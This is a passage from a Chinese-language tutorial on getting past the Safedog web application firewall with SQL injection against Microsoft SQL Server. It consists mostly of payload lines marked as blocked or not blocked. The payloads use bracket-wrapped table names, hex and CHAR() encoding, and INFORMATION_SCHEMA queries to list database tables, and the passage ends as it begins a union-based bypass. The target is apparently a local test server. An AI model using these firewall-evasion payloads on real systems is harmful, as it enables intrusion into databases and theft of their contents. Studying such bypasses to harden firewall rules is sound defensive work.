    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sysobjects </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> xtype</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'u'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">!=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'info'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);--</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);--</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);--</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> a</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);--</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">!);--</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
   </ol>

可见安全狗在这里拦截的是我们from后面跟字符型或者数字型,我们就只需要找到一个符号来包裹他就可以,在mssql中可以包裹表库名称的符号是[]

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sysobjects</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]);--</span></code></span></span></p></li>
   </ol>

确实也不拦截继续往后测试

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sysobjects</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> xtype</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'u'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);--</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sysobjects</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> xtype</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=);--</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
   </ol>

很简单我们在mssql中可以用char 和hex 来编码我们的表名

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sysobjects</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> xtype</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0x75</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);--</span></code></span></span></p></li>
   </ol>

基本上已经绕过了我们的爆出第一个表名的目的,假如要爆其他的表名 测试发现也是拦截 引号字符而已 用相同的方法绕过即可

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sysobjects</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> xtype</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0x75</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">not</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">in</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">105</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)%</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2BCHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">110</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)%</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2BCHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">102</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)%</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2BCHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">111</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">),</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">97</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)%</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2BCHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">100</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)%</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2BCHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">109</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)%</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2BCHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">105</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)%</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2BCHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">110</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)));</span></code></span></span></p></li>
   </ol>

其实还有一种方法爆表名利用INFORMATION_SCHEMA,但是安全狗有个设置直接拦截这个关键词,但是不是默认开启的,顺便提一下

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 and ~1=(select top 1 table_name from [INFORMATION_SCHEMA].[TABLES] where table_name not in (char(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)));--</span></code></span></span></p></li>
   </ol>

0x02 简单的联合bypass

union/!1113/

联合注入感觉是个非常简单的bypass过程,因为安全狗的规则把mysql和mssql混为一谈

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">union</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
    <li><p><br></p></li>
